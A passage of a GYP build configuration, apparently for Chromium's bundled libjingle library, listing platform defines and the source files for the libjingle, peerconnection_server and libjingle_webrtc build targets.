'<(DEPTH)/third_party/nss/nss.gyp:nspr',
'<(DEPTH)/third_party/nss/nss.gyp:nss',
],
}],
],
}],
['OS=="win"', {
'include_dirs': [
'../third_party/platformsdk_win7/files/Include',
],
'conditions' : [
['target_arch == "ia32"', {
'defines': [
'_USE_32BIT_TIME_T',
],
}],
],
}],
['clang == 1', {
'xcode_settings': {
'WARNING_CFLAGS!': [
# Don't warn about string->bool used in asserts.
'-Wstring-conversion',
],
},
'cflags!': [
'-Wstring-conversion',
],
}],
['OS=="linux"', {
'defines': [
'LINUX',
],
}],
['OS=="mac"', {
'defines': [
'OSX',
],
}],
['OS=="ios"', {
'defines': [
'IOS',
],
}],
['os_posix == 1', {
'defines': [
'POSIX',
],
}],
['os_bsd==1', {
'defines': [
'BSD',
],
}],
['OS=="openbsd"', {
'defines': [
'OPENBSD',
],
}],
['OS=="freebsd"', {
'defines': [
'FREEBSD',
],
}],
],
},
'targets': [
{
'target_name': 'libjingle',
'type': 'static_library',
'sources': [
'overrides/talk/base/basictypes.h',
'overrides/talk/base/constructormagic.h',
# Overrides logging.h/.cc because libjingle logging should be done to
# the same place as the chromium logging.
'overrides/talk/base/logging.cc',
'overrides/talk/base/logging.h',
'<(libjingle_source)/talk/base/asyncfile.cc',
'<(libjingle_source)/talk/base/asyncfile.h',
'<(libjingle_source)/talk/base/asynchttprequest.cc',
'<(libjingle_source)/talk/base/asynchttprequest.h',
'<(libjingle_source)/talk/base/asyncpacketsocket.h',
'<(libjingle_source)/talk/base/asyncsocket.cc',
'<(libjingle_source)/talk/base/asyncsocket.h',
'<(libjingle_source)/talk/base/asynctcpsocket.cc',
'<(libjingle_source)/talk/base/asynctcpsocket.h',
'<(libjingle_source)/talk/base/asyncudpsocket.cc',
'<(libjingle_source)/talk/base/asyncudpsocket.h',
'<(libjingle_source)/talk/base/autodetectproxy.cc',
'<(libjingle_source)/talk/base/autodetectproxy.h',
'<(libjingle_source)/talk/base/base64.cc',
'<(libjingle_source)/talk/base/base64.h',
'<(libjingle_source)/talk/base/basicdefs.h',
'<(libjingle_source)/talk/base/basicpacketsocketfactory.cc',
'<(libjingle_source)/talk/base/basicpacketsocketfactory.h',
'<(libjingle_source)/talk/base/bytebuffer.cc',
'<(libjingle_source)/talk/base/bytebuffer.h',
'<(libjingle_source)/talk/base/byteorder.h',
'<(libjingle_source)/talk/base/checks.cc',
'<(libjingle_source)/talk/base/checks.h',
'<(libjingle_source)/talk/base/common.cc',
'<(libjingle_source)/talk/base/common.h',
'<(libjingle_source)/talk/base/cpumonitor.cc',
'<(libjingle_source)/talk/base/cpumonitor.h',
'<(libjingle_source)/talk/base/crc32.cc',
'<(libjingle_source)/talk/base/crc32.h',
'<(libjingle_source)/talk/base/criticalsection.h',
'<(libjingle_source)/talk/base/cryptstring.h',
'<(libjingle_source)/talk/base/diskcache.cc',
'<(libjingle_source)/talk/base/diskcache.h',
'<(libjingle_source)/talk/base/event.cc',
'<(libjingle_source)/talk/base/event.h',
'<(libjingle_source)/talk/base/fileutils.cc',
'<(libjingle_source)/talk/base/fileutils.h',
'<(libjingle_source)/talk/base/firewallsocketserver.cc',
'<(libjingle_source)/talk/base/firewallsocketserver.h',
'<(libjingle_source)/talk/base/flags.cc',
'<(libjingle_source)/talk/base/flags.h',
'<(libjingle_source)/talk/base/helpers.cc',
'<(libjingle_source)/talk/base/helpers.h',
'<(libjingle_source)/talk/base/host.cc',
'<(libjingle_source)/talk/base/host.h',
'<(libjingle_source)/talk/base/httpbase.cc',
'<(libjingle_source)/talk/base/httpbase.h',
'<(libjingle_source)/talk/base/httpclient.cc',
'<(libjingle_source)/talk/base/httpclient.h',
'<(libjingle_source)/talk/base/httpcommon-inl.h',
'<(libjingle_source)/talk/base/httpcommon.cc',
'<(libjingle_source)/talk/base/httpcommon.h',
'<(libjingle_source)/talk/base/httprequest.cc',
'<(libjingle_source)/talk/base/httprequest.h',
'<(libjingle_source)/talk/base/ipaddress.cc',
'<(libjingle_source)/talk/base/ipaddress.h',
'<(libjingle_source)/talk/base/json.cc',
'<(libjingle_source)/talk/base/json.h',
'<(libjingle_source)/talk/base/linked_ptr.h',
'<(libjingle_source)/talk/base/md5.cc',
'<(libjingle_source)/talk/base/md5.h',
'<(libjingle_source)/talk/base/md5digest.h',
'<(libjingle_source)/talk/base/messagedigest.cc',
'<(libjingle_source)/talk/base/messagedigest.h',
'<(libjingle_source)/talk/base/messagehandler.cc',
'<(libjingle_source)/talk/base/messagehandler.h',
'<(libjingle_source)/talk/base/messagequeue.cc',
'<(libjingle_source)/talk/base/messagequeue.h',
'<(libjingle_source)/talk/base/nethelpers.cc',
'<(libjingle_source)/talk/base/nethelpers.h',
'<(libjingle_source)/talk/base/network.cc',
'<(libjingle_source)/talk/base/network.h',
'<(libjingle_source)/talk/base/nssidentity.cc',
'<(libjingle_source)/talk/base/nssidentity.h',
'<(libjingle_source)/talk/base/nssstreamadapter.cc',
'<(libjingle_source)/talk/base/nssstreamadapter.h',
'<(libjingle_source)/talk/base/nullsocketserver.h',
'<(libjingle_source)/talk/base/pathutils.cc',
'<(libjingle_source)/talk/base/pathutils.h',
'<(libjingle_source)/talk/base/physicalsocketserver.cc',
'<(libjingle_source)/talk/base/physicalsocketserver.h',
'<(libjingle_source)/talk/base/proxydetect.cc',
'<(libjingle_source)/talk/base/proxydetect.h',
'<(libjingle_source)/talk/base/proxyinfo.cc',
'<(libjingle_source)/talk/base/proxyinfo.h',
'<(libjingle_source)/talk/base/ratelimiter.cc',
'<(libjingle_source)/talk/base/ratelimiter.h',
'<(libjingle_source)/talk/base/ratetracker.cc',
'<(libjingle_source)/talk/base/ratetracker.h',
'<(libjingle_source)/talk/base/scoped_ptr.h',
'<(libjingle_source)/talk/base/sec_buffer.h',
'<(libjingle_source)/talk/base/sha1.cc',
'<(libjingle_source)/talk/base/sha1.h',
'<(libjingle_source)/talk/base/sha1digest.h',
'<(libjingle_source)/talk/base/signalthread.cc',
'<(libjingle_source)/talk/base/signalthread.h',
'<(libjingle_source)/talk/base/sigslot.h',
'<(libjingle_source)/talk/base/sigslotrepeater.h',
'<(libjingle_source)/talk/base/socket.h',
'<(libjingle_source)/talk/base/socketadapters.cc',
'<(libjingle_source)/talk/base/socketadapters.h',
'<(libjingle_source)/talk/base/socketaddress.cc',
'<(libjingle_source)/talk/base/socketaddress.h',
'<(libjingle_source)/talk/base/socketaddresspair.cc',
'<(libjingle_source)/talk/base/socketaddresspair.h',
'<(libjingle_source)/talk/base/socketfactory.h',
'<(libjingle_source)/talk/base/socketpool.cc',
'<(libjingle_source)/talk/base/socketpool.h',
'<(libjingle_source)/talk/base/socketserver.h',
'<(libjingle_source)/talk/base/socketstream.cc',
'<(libjingle_source)/talk/base/socketstream.h',
'<(libjingle_source)/talk/base/ssladapter.cc',
'<(libjingle_source)/talk/base/ssladapter.h',
'<(libjingle_source)/talk/base/sslidentity.cc',
'<(libjingle_source)/talk/base/sslidentity.h',
'<(libjingle_source)/talk/base/sslsocketfactory.cc',
'<(libjingle_source)/talk/base/sslsocketfactory.h',
'<(libjingle_source)/talk/base/sslstreamadapter.cc',
'<(libjingle_source)/talk/base/sslstreamadapter.h',
'<(libjingle_source)/talk/base/sslstreamadapterhelper.cc',
'<(libjingle_source)/talk/base/sslstreamadapterhelper.h',
'<(libjingle_source)/talk/base/stream.cc',
'<(libjingle_source)/talk/base/stream.h',
'<(libjingle_source)/talk/base/stringencode.cc',
'<(libjingle_source)/talk/base/stringencode.h',
'<(libjingle_source)/talk/base/stringutils.cc',
'<(libjingle_source)/talk/base/stringutils.h',
'<(libjingle_source)/talk/base/systeminfo.cc',
'<(libjingle_source)/talk/base/systeminfo.h',
'<(libjingle_source)/talk/base/task.cc',
'<(libjingle_source)/talk/base/task.h',
'<(libjingle_source)/talk/base/taskparent.cc',
'<(libjingle_source)/talk/base/taskparent.h',
'<(libjingle_source)/talk/base/taskrunner.cc',
'<(libjingle_source)/talk/base/taskrunner.h',
'<(libjingle_source)/talk/base/thread.cc',
'<(libjingle_source)/talk/base/thread.h',
'<(libjingle_source)/talk/base/timeutils.cc',
'<(libjingle_source)/talk/base/timeutils.h',
'<(libjingle_source)/talk/base/timing.cc',
'<(libjingle_source)/talk/base/timing.h',
'<(libjingle_source)/talk/base/urlencode.cc',
'<(libjingle_source)/talk/base/urlencode.h',
'<(libjingle_source)/talk/base/worker.cc',
'<(libjingle_source)/talk/base/worker.h',
'<(libjingle_source)/talk/p2p/base/candidate.h',
'<(libjingle_source)/talk/p2p/base/common.h',
'<(libjingle_source)/talk/p2p/base/dtlstransport.h',
'<(libjingle_source)/talk/p2p/base/dtlstransportchannel.cc',
'<(libjingle_source)/talk/p2p/base/dtlstransportchannel.h',
'<(libjingle_source)/talk/p2p/base/p2ptransport.cc',
'<(libjingle_source)/talk/p2p/base/p2ptransport.h',
'<(libjingle_source)/talk/p2p/base/p2ptransportchannel.cc',
'<(libjingle_source)/talk/p2p/base/p2ptransportchannel.h',
'<(libjingle_source)/talk/p2p/base/parsing.cc',
'<(libjingle_source)/talk/p2p/base/parsing.h',
'<(libjingle_source)/talk/p2p/base/port.cc',
'<(libjingle_source)/talk/p2p/base/port.h',
'<(libjingle_source)/talk/p2p/base/portallocator.cc',
'<(libjingle_source)/talk/p2p/base/portallocator.h',
'<(libjingle_source)/talk/p2p/base/portallocatorsessionproxy.cc',
'<(libjingle_source)/talk/p2p/base/portallocatorsessionproxy.h',
'<(libjingle_source)/talk/p2p/base/portproxy.cc',
'<(libjingle_source)/talk/p2p/base/portproxy.h',
'<(libjingle_source)/talk/p2p/base/pseudotcp.cc',
'<(libjingle_source)/talk/p2p/base/pseudotcp.h',
'<(libjingle_source)/talk/p2p/base/rawtransport.cc',
'<(libjingle_source)/talk/p2p/base/rawtransport.h',
'<(libjingle_source)/talk/p2p/base/rawtransportchannel.cc',
'<(libjingle_source)/talk/p2p/base/rawtransportchannel.h',
'<(libjingle_source)/talk/p2p/base/relayport.cc',
'<(libjingle_source)/talk/p2p/base/relayport.h',
'<(libjingle_source)/talk/p2p/base/session.cc',
'<(libjingle_source)/talk/p2p/base/session.h',
'<(libjingle_source)/talk/p2p/base/sessionclient.h',
'<(libjingle_source)/talk/p2p/base/sessiondescription.cc',
'<(libjingle_source)/talk/p2p/base/sessiondescription.h',
'<(libjingle_source)/talk/p2p/base/sessionid.h',
'<(libjingle_source)/talk/p2p/base/sessionmanager.cc',
'<(libjingle_source)/talk/p2p/base/sessionmanager.h',
'<(libjingle_source)/talk/p2p/base/sessionmessages.cc',
'<(libjingle_source)/talk/p2p/base/sessionmessages.h',
'<(libjingle_source)/talk/p2p/base/stun.cc',
'<(libjingle_source)/talk/p2p/base/stun.h',
'<(libjingle_source)/talk/p2p/base/stunport.cc',
'<(libjingle_source)/talk/p2p/base/stunport.h',
'<(libjingle_source)/talk/p2p/base/stunrequest.cc',
'<(libjingle_source)/talk/p2p/base/stunrequest.h',
'<(libjingle_source)/talk/p2p/base/tcpport.cc',
'<(libjingle_source)/talk/p2p/base/tcpport.h',
'<(libjingle_source)/talk/p2p/base/transport.cc',
'<(libjingle_source)/talk/p2p/base/transport.h',
'<(libjingle_source)/talk/p2p/base/transportchannel.cc',
'<(libjingle_source)/talk/p2p/base/transportchannel.h',
'<(libjingle_source)/talk/p2p/base/transportchannelimpl.h',
'<(libjingle_source)/talk/p2p/base/transportchannelproxy.cc',
'<(libjingle_source)/talk/p2p/base/transportchannelproxy.h',
'<(libjingle_source)/talk/p2p/base/transportdescriptionfactory.cc',
'<(libjingle_source)/talk/p2p/base/transportdescriptionfactory.h',
'<(libjingle_source)/talk/p2p/base/turnport.cc',
'<(libjingle_source)/talk/p2p/base/turnport.h',
'<(libjingle_source)/talk/p2p/client/basicportallocator.cc',
'<(libjingle_source)/talk/p2p/client/basicportallocator.h',
'<(libjingle_source)/talk/p2p/client/httpportallocator.cc',
'<(libjingle_source)/talk/p2p/client/httpportallocator.h',
'<(libjingle_source)/talk/p2p/client/sessionmanagertask.h',
'<(libjingle_source)/talk/p2p/client/sessionsendtask.h',
'<(libjingle_source)/talk/p2p/client/socketmonitor.cc',
'<(libjingle_source)/talk/p2p/client/socketmonitor.h',
'<(libjingle_source)/talk/xmllite/qname.cc',
'<(libjingle_source)/talk/xmllite/qname.h',
'<(libjingle_source)/talk/xmllite/xmlbuilder.cc',
'<(libjingle_source)/talk/xmllite/xmlbuilder.h',
'<(libjingle_source)/talk/xmllite/xmlconstants.cc',
'<(libjingle_source)/talk/xmllite/xmlconstants.h',
'<(libjingle_source)/talk/xmllite/xmlelement.cc',
'<(libjingle_source)/talk/xmllite/xmlelement.h',
'<(libjingle_source)/talk/xmllite/xmlnsstack.cc',
'<(libjingle_source)/talk/xmllite/xmlnsstack.h',
'<(libjingle_source)/talk/xmllite/xmlparser.cc',
'<(libjingle_source)/talk/xmllite/xmlparser.h',
'<(libjingle_source)/talk/xmllite/xmlprinter.cc',
'<(libjingle_source)/talk/xmllite/xmlprinter.h',
'<(libjingle_source)/talk/xmpp/asyncsocket.h',
'<(libjingle_source)/talk/xmpp/constants.cc',
'<(libjingle_source)/talk/xmpp/constants.h',
'<(libjingle_source)/talk/xmpp/jid.cc',
'<(libjingle_source)/talk/xmpp/jid.h',
'<(libjingle_source)/talk/xmpp/plainsaslhandler.h',
'<(libjingle_source)/talk/xmpp/prexmppauth.h',
'<(libjingle_source)/talk/xmpp/saslcookiemechanism.h',
'<(libjingle_source)/talk/xmpp/saslhandler.h',
'<(libjingle_source)/talk/xmpp/saslmechanism.cc',
'<(libjingle_source)/talk/xmpp/saslmechanism.h',
'<(libjingle_source)/talk/xmpp/saslplainmechanism.h',
'<(libjingle_source)/talk/xmpp/xmppclient.cc',
'<(libjingle_source)/talk/xmpp/xmppclient.h',
'<(libjingle_source)/talk/xmpp/xmppclientsettings.h',
'<(libjingle_source)/talk/xmpp/xmppengine.h',
'<(libjingle_source)/talk/xmpp/xmppengineimpl.cc',
'<(libjingle_source)/talk/xmpp/xmppengineimpl.h',
'<(libjingle_source)/talk/xmpp/xmppengineimpl_iq.cc',
'<(libjingle_source)/talk/xmpp/xmpplogintask.cc',
'<(libjingle_source)/talk/xmpp/xmpplogintask.h',
'<(libjingle_source)/talk/xmpp/xmppstanzaparser.cc',
'<(libjingle_source)/talk/xmpp/xmppstanzaparser.h',
'<(libjingle_source)/talk/xmpp/xmpptask.cc',
'<(libjingle_source)/talk/xmpp/xmpptask.h',
],
'dependencies': [
'<(DEPTH)/third_party/jsoncpp/jsoncpp.gyp:jsoncpp',
'libjingle_p2p_constants',
'<@(libjingle_additional_deps)',
],
'export_dependent_settings': [
'<(DEPTH)/third_party/jsoncpp/jsoncpp.gyp:jsoncpp',
],
'conditions': [
['OS=="win"', {
'sources': [
'overrides/talk/base/win32socketinit.cc',
'<(libjingle_source)/talk/base/schanneladapter.cc',
'<(libjingle_source)/talk/base/schanneladapter.h',
'<(libjingle_source)/talk/base/win32.cc',
'<(libjingle_source)/talk/base/win32.h',
'<(libjingle_source)/talk/base/win32filesystem.cc',
'<(libjingle_source)/talk/base/win32filesystem.h',
'<(libjingle_source)/talk/base/win32window.h',
'<(libjingle_source)/talk/base/win32window.cc',
'<(libjingle_source)/talk/base/win32securityerrors.cc',
'<(libjingle_source)/talk/base/winfirewall.cc',
'<(libjingle_source)/talk/base/winfirewall.h',
'<(libjingle_source)/talk/base/winping.cc',
'<(libjingle_source)/talk/base/winping.h',
],
# Suppress warnings about WIN32_LEAN_AND_MEAN.
'msvs_disabled_warnings': [ 4005, 4267 ],
}],
['os_posix == 1', {
'sources': [
'<(libjingle_source)/talk/base/unixfilesystem.cc',
'<(libjingle_source)/talk/base/unixfilesystem.h',
],
}],
['OS=="linux"', {
'sources': [
'<(libjingle_source)/talk/base/latebindingsymboltable.cc',
'<(libjingle_source)/talk/base/latebindingsymboltable.h',
'<(libjingle_source)/talk/base/linux.cc',
'<(libjingle_source)/talk/base/linux.h',
],
}],
['OS=="mac" or OS=="ios"', {
'sources': [
'<(libjingle_source)/talk/base/macconversion.cc',
'<(libjingle_source)/talk/base/macconversion.h',
'<(libjingle_source)/talk/base/maccocoathreadhelper.h',
'<(libjingle_source)/talk/base/maccocoathreadhelper.mm',
'<(libjingle_source)/talk/base/macutils.cc',
'<(libjingle_source)/talk/base/macutils.h',
'<(libjingle_source)/talk/base/scoped_autorelease_pool.h',
'<(libjingle_source)/talk/base/scoped_autorelease_pool.mm',
],
}],
['OS=="android"', {
'sources': [
'<(libjingle_source)/talk/base/ifaddrs-android.cc',
'<(libjingle_source)/talk/base/ifaddrs-android.h',
'<(libjingle_source)/talk/base/linux.cc',
'<(libjingle_source)/talk/base/linux.h',
],
'sources!': [
# These depend on jsoncpp which we don't load because we probably
# don't actually need this code at all.
'<(libjingle_source)/talk/base/json.cc',
'<(libjingle_source)/talk/base/json.h',
],
'dependencies!': [
'<(DEPTH)/third_party/jsoncpp/jsoncpp.gyp:jsoncpp',
],
}],
['use_openssl==1', {
'sources': [
'<(libjingle_source)/talk/base/openssladapter.cc',
'<(libjingle_source)/talk/base/openssldigest.cc',
'<(libjingle_source)/talk/base/opensslidentity.cc',
'<(libjingle_source)/talk/base/opensslstreamadapter.cc',
],
}],
],
}, # target libjingle
# This has to be is a separate project due to a bug in MSVS 2008 and the
# current toolset on android. The problem is that we have two files named
# "constants.cc" and MSVS/android doesn't handle this properly.
# GYP currently has guards to catch this, so if you want to remove it,
# run GYP and if GYP has removed the validation check, then we can assume
# that the toolchains have been fixed (we currently use VS2010 and later,
# so VS2008 isn't a concern anymore).
{
'target_name': 'libjingle_p2p_constants',
'type': 'static_library',
'sources': [
'<(libjingle_source)/talk/p2p/base/constants.cc',
'<(libjingle_source)/talk/p2p/base/constants.h',
],
}, # target libjingle_p2p_constants
{
'target_name': 'peerconnection_server',
'type': 'executable',
'sources': [
'<(libjingle_source)/talk/examples/peerconnection/server/data_socket.cc',
'<(libjingle_source)/talk/examples/peerconnection/server/data_socket.h',
'<(libjingle_source)/talk/examples/peerconnection/server/main.cc',
'<(libjingle_source)/talk/examples/peerconnection/server/peer_channel.cc',
'<(libjingle_source)/talk/examples/peerconnection/server/peer_channel.h',
'<(libjingle_source)/talk/examples/peerconnection/server/utils.cc',
'<(libjingle_source)/talk/examples/peerconnection/server/utils.h',
],
'include_dirs': [
'<(libjingle_source)',
],
'dependencies': [
'libjingle',
],
# TODO(jschuh): crbug.com/167187 fix size_t to int truncations.
'msvs_disabled_warnings': [ 4309, ],
}, # target peerconnection_server
],
'conditions': [
['enable_webrtc==1', {
'targets': [
{
'target_name': 'libjingle_webrtc',
'type': 'static_library',
'all_dependent_settings': {
'conditions': [
['"<(libpeer_target_type)"=="static_library"', {
'defines': [ 'LIBPEERCONNECTION_LIB=1' ],
}],
],
},
'sources': [
'<(libjingle_source)/talk/app/webrtc/audiotrack.cc',
'<(libjingle_source)/talk/app/webrtc/audiotrack.h',
'<(libjingle_source)/talk/app/webrtc/datachannel.cc',
'<(libjingle_source)/talk/app/webrtc/datachannel.h',
'<(libjingle_source)/talk/app/webrtc/dtmfsender.cc',
'<(libjingle_source)/talk/app/webrtc/dtmfsender.h',
'<(libjingle_source)/talk/app/webrtc/jsep.h',
'<(libjingle_source)/talk/app/webrtc/jsepicecandidate.cc',
'<(libjingle_source)/talk/app/webrtc/jsepicecandidate.h',
'<(libjingle_source)/talk/app/webrtc/jsepsessiondescription.cc',
'<(libjingle_source)/talk/app/webrtc/jsepsessiondescription.h',
'<(libjingle_source)/talk/app/webrtc/localaudiosource.cc',
'<(libjingle_source)/talk/app/webrtc/localaudiosource.h',
'<(libjingle_source)/talk/app/webrtc/localvideosource.cc',
'<(libjingle_source)/talk/app/webrtc/localvideosource.h',
'<(libjingle_source)/talk/app/webrtc/mediastream.cc',
'<(libjingle_source)/talk/app/webrtc/mediastream.h',
'<(libjingle_source)/talk/app/webrtc/mediastreamhandler.cc',
'<(libjingle_source)/talk/app/webrtc/mediastreamhandler.h',
'<(libjingle_source)/talk/app/webrtc/mediaconstraintsinterface.cc',
'<(libjingle_source)/talk/app/webrtc/mediaconstraintsinterface.h',
'<(libjingle_source)/talk/app/webrtc/mediastreaminterface.h',
'<(libjingle_source)/talk/app/webrtc/mediastreamprovider.h',
'<(libjingle_source)/talk/app/webrtc/mediastreamproxy.h',
'<(libjingle_source)/talk/app/webrtc/mediastreamsignaling.cc',
'<(libjingle_source)/talk/app/webrtc/mediastreamsignaling.h',
'<(libjingle_source)/talk/app/webrtc/mediastreamtrack.h',
'<(libjingle_source)/talk/app/webrtc/mediastreamtrackproxy.h',
'<(libjingle_source)/talk/app/webrtc/notifier.h',
'<(libjingle_source)/talk/app/webrtc/peerconnection.cc',
'<(libjingle_source)/talk/app/webrtc/peerconnection.h',
'<(libjingle_source)/talk/app/webrtc/peerconnectionfactory.cc',
'<(libjingle_source)/talk/app/webrtc/peerconnectionfactory.h',
'<(libjingle_source)/talk/app/webrtc/peerconnectioninterface.h',
'<(libjingle_source)/talk/app/webrtc/portallocatorfactory.cc',
'<(libjingle_source)/talk/app/webrtc/portallocatorfactory.h',
'<(libjingle_source)/talk/app/webrtc/statscollector.cc',
'<(libjingle_source)/talk/app/webrtc/statscollector.h',
'<(libjingle_source)/talk/app/webrtc/statstypes.h',
'<(libjingle_source)/talk/app/webrtc/streamcollection.h',
'<(libjingle_source)/talk/app/webrtc/videosourceinterface.h',
'<(libjingle_source)/talk/app/webrtc/videosourceproxy.h',
'<(libjingle_source)/talk/app/webrtc/videotrack.cc',
'<(libjingle_source)/talk/app/webrtc/videotrack.h',
'<(libjingle_source)/talk/app/webrtc/videotrackrenderers.cc',
'<(libjingle_source)/talk/app/webrtc/videotrackrenderers.h',
'<(libjingle_source)/talk/app/webrtc/webrtcsdp.cc',
'<(libjingle_source)/talk/app/webrtc/webrtcsdp.h',
'<(libjingle_source)/talk/app/webrtc/webrtcsession.cc',
'<(libjingle_source)/talk/app/webrtc/webrtcsession.h',
'<(libjingle_source)/talk/media/base/capturemanager.cc',
'<(libjingle_source)/talk/media/base/capturemanager.h',
'<(libjingle_source)/talk/media/base/capturerenderadapter.cc',
'<(libjingle_source)/talk/media/base/capturerenderadapter.h',
'<(libjingle_source)/talk/media/base/codec.cc',
'<(libjingle_source)/talk/media/base/codec.h',
'<(libjingle_source)/talk/media/base/constants.cc',
'<(libjingle_source)/talk/media/base/constants.h',
'<(libjingle_source)/talk/media/base/cryptoparams.h',
'<(libjingle_source)/talk/media/base/filemediaengine.cc',
'<(libjingle_source)/talk/media/base/filemediaengine.h',
'<(libjingle_source)/talk/media/base/hybriddataengine.h',
'<(libjingle_source)/talk/media/base/mediachannel.h',
'<(libjingle_source)/talk/media/base/mediaengine.cc',
'<(libjingle_source)/talk/media/base/mediaengine.h',
'<(libjingle_source)/talk/media/base/rtpdataengine.cc',
'<(libjingle_source)/talk/media/base/rtpdataengine.h',
'<(libjingle_source)/talk/media/base/rtpdump.cc',
'<(libjingle_source)/talk/media/base/rtpdump.h',
'<(libjingle_source)/talk/media/base/rtputils.cc',
'<(libjingle_source)/talk/media/base/rtputils.h',
'<(libjingle_source)/talk/media/base/streamparams.cc',
'<(libjingle_source)/talk/media/base/streamparams.h',
'<(libjingle_source)/talk/media/base/videoadapter.cc',
'<(libjingle_source)/talk/media/base/videoadapter.h',
'<(libjingle_source)/talk/media/base/videocapturer.cc',
'<(libjingle_source)/talk/media/base/videocapturer.h',
'<(libjingle_source)/talk/media/base/videocommon.cc',
'<(libjingle_source)/talk/media/base/videocommon.h',
'<(libjingle_source)/talk/media/base/videoframe.cc',
'<(libjingle_source)/talk/media/base/videoframe.h',
'<(libjingle_source)/talk/media/devices/dummydevicemanager.cc',
'<(libjingle_source)/talk/media/devices/dummydevicemanager.h',
'<(libjingle_source)/talk/media/devices/filevideocapturer.cc',
'<(libjingle_source)/talk/media/devices/filevideocapturer.h',
'<(libjingle_source)/talk/media/webrtc/webrtccommon.h',
'<(libjingle_source)/talk/media/webrtc/webrtcpassthroughrender.cc',
'<(libjingle_source)/talk/media/webrtc/webrtcvideocapturer.cc',
'<(libjingle_source)/talk/media/webrtc/webrtcvideocapturer.h',
'<(libjingle_source)/talk/media/webrtc/webrtcvideoframe.cc',
'<(libjingle_source)/talk/media/webrtc/webrtcvideoframe.h',
'<(libjingle_source)/talk/media/webrtc/webrtcvie.h',
'<(libjingle_source)/talk/media/webrtc/webrtcvoe.h',
'<(libjingle_source)/talk/session/media/audiomonitor.cc',
'<(libjingle_source)/talk/session/media/audiomonitor.h',
'<(libjingle_source)/talk/session/media/call.cc',
'<(libjingle_source)/talk/session/media/call.h',
'<(libjingle_source)/talk/session/media/channel.cc',
'<(libjingle_source)/talk/session/media/channel.h',
'<(libjingle_source)/talk/session/media/channelmanager.cc',
'<(libjingle_source)/talk/session/media/channelmanager.h',
'<(libjingle_source)/talk/session/media/currentspeakermonitor.cc',
'<(libjingle_source)/talk/session/media/currentspeakermonitor.h',
'<(libjingle_source)/talk/session/media/mediamessages.cc',
'<(libjingle_source)/talk/session/media/mediamessages.h',
'<(libjingle_source)/talk/session/media/mediamonitor.cc',
'<(libjingle_source)/talk/session/media/mediamonitor.h',
'<(libjingle_source)/talk/session/media/mediasession.cc',
'<(libjingle_source)/talk/session/media/mediasession.h',
'<(libjingle_source)/talk/session/media/mediasessionclient.cc',
'<(libjingle_source)/talk/session/media/mediasessionclient.h',
'<(libjingle_source)/talk/session/media/mediasink.h',
'<(libjingle_source)/talk/session/media/rtcpmuxfilter.cc',
'<(libjingle_source)/talk/session/media/rtcpmuxfilter.h',
'<(libjingle_source)/talk/session/media/soundclip.cc',
'<(libjingle_source)/talk/session/media/soundclip.h',
'<(libjingle_source)/talk/session/media/srtpfilter.cc',
'<(libjingle_source)/talk/session/media/srtpfilter.h',
'<(libjingle_source)/talk/session/media/ssrcmuxfilter.cc',
'<(libjingle_source)/talk/session/media/ssrcmuxfilter.h',
'<(libjingle_source)/talk/session/media/typingmonitor.cc',
'<(libjingle_source)/talk/session/media/typingmonitor.h',
'<(libjingle_source)/talk/session/media/voicechannel.h',
'<(libjingle_source)/talk/session/tunnel/pseudotcpchannel.cc',
'<(libjingle_source)/talk/session/tunnel/pseudotcpchannel.h',
'<(libjingle_source)/talk/session/tunnel/tunnelsessionclient.cc',
'<(libjingle_source)/talk/session/tunnel/tunnelsessionclient.h',
],
'conditions': [
['libpeer_allocator_shim==1 and '
'libpeer_target_type=="shared_library" and '
'component!="shared_library"', {
'sources': [
'overrides/allocator_shim/allocator_stub.cc',
],
'sources/': [
# |allocator_stub.cc| will include this file directly to ensure
# that the stub code gets included with whatever depends on
# peerconnectionfactory, also includes the stub code. If we
# don't do that, the linker is free to discard the stub code
# since it by itself does not have any dependencies.
['exclude', '<(libjingle_source)/talk/app/webrtc/peerconnectionfactory.cc'],
],
}],
['enabled_libjingle_device_manager==1', {
'sources!': [
'<(libjingle_source)/talk/media/devices/dummydevicemanager.cc',
'<(libjingle_source)/talk/media/devices/dummydevicemanager.h',
],
'sources': [
'<(libjingle_source)/talk/media/devices/devicemanager.cc',
'<(libjingle_source)/talk/media/devices/devicemanager.h',
'<(libjingle_source)/talk/sound/nullsoundsystem.cc',
'<(libjingle_source)/talk/sound/nullsoundsystem.h',
'<(libjingle_source)/talk/sound/nullsoundsystemfactory.cc',
'<(libjingle_source)/talk/sound/nullsoundsystemfactory.h',
'<(libjingle_source)/talk/sound/platformsoundsystem.cc',
'<(libjingle_source)/talk/sound/platformsoundsystem.h',
'<(libjingle_source)/talk/sound/platformsoundsystemfactory.cc',
'<(libjingle_source)/talk/sound/platformsoundsystemfactory.h',
'<(libjingle_source)/talk/sound/soundsysteminterface.cc',
'<(libjingle_source)/talk/sound/soundsysteminterface.h',
'<(libjingle_source)/talk/sound/soundsystemproxy.cc',
'<(libjingle_source)/talk/sound/soundsystemproxy.h',
],
'conditions': [
['OS=="win"', {
'sources': [
'<(libjingle_source)/talk/base/win32window.cc',
'<(libjingle_source)/talk/base/win32window.h',
'<(libjingle_source)/talk/base/win32windowpicker.cc',
'<(libjingle_source)/talk/base/win32windowpicker.h',
'<(libjingle_source)/talk/media/devices/win32deviceinfo.cc',
'<(libjingle_source)/talk/media/devices/win32devicemanager.cc',
'<(libjingle_source)/talk/media/devices/win32devicemanager.h',
],
}],
['OS=="linux"', {
'sources': [
'<(libjingle_source)/talk/base/linuxwindowpicker.cc',
'<(libjingle_source)/talk/base/linuxwindowpicker.h',
'<(libjingle_source)/talk/media/devices/libudevsymboltable.cc',
'<(libjingle_source)/talk/media/devices/libudevsymboltable.h',
'<(libjingle_source)/talk/media/devices/linuxdeviceinfo.cc',
'<(libjingle_source)/talk/media/devices/linuxdevicemanager.cc',
'<(libjingle_source)/talk/media/devices/linuxdevicemanager.h',
'<(libjingle_source)/talk/media/devices/v4llookup.cc',
'<(libjingle_source)/talk/media/devices/v4llookup.h',
'<(libjingle_source)/talk/sound/alsasoundsystem.cc',
'<(libjingle_source)/talk/sound/alsasoundsystem.h',
'<(libjingle_source)/talk/sound/alsasymboltable.cc',
'<(libjingle_source)/talk/sound/alsasymboltable.h',
'<(libjingle_source)/talk/sound/linuxsoundsystem.cc',
'<(libjingle_source)/talk/sound/linuxsoundsystem.h',
'<(libjingle_source)/talk/sound/pulseaudiosoundsystem.cc',
'<(libjingle_source)/talk/sound/pulseaudiosoundsystem.h',
'<(libjingle_source)/talk/sound/pulseaudiosymboltable.cc',
'<(libjingle_source)/talk/sound/pulseaudiosymboltable.h',
],
}],
['OS=="mac"', {
'sources': [
'<(libjingle_source)/talk/media/devices/macdeviceinfo.cc',
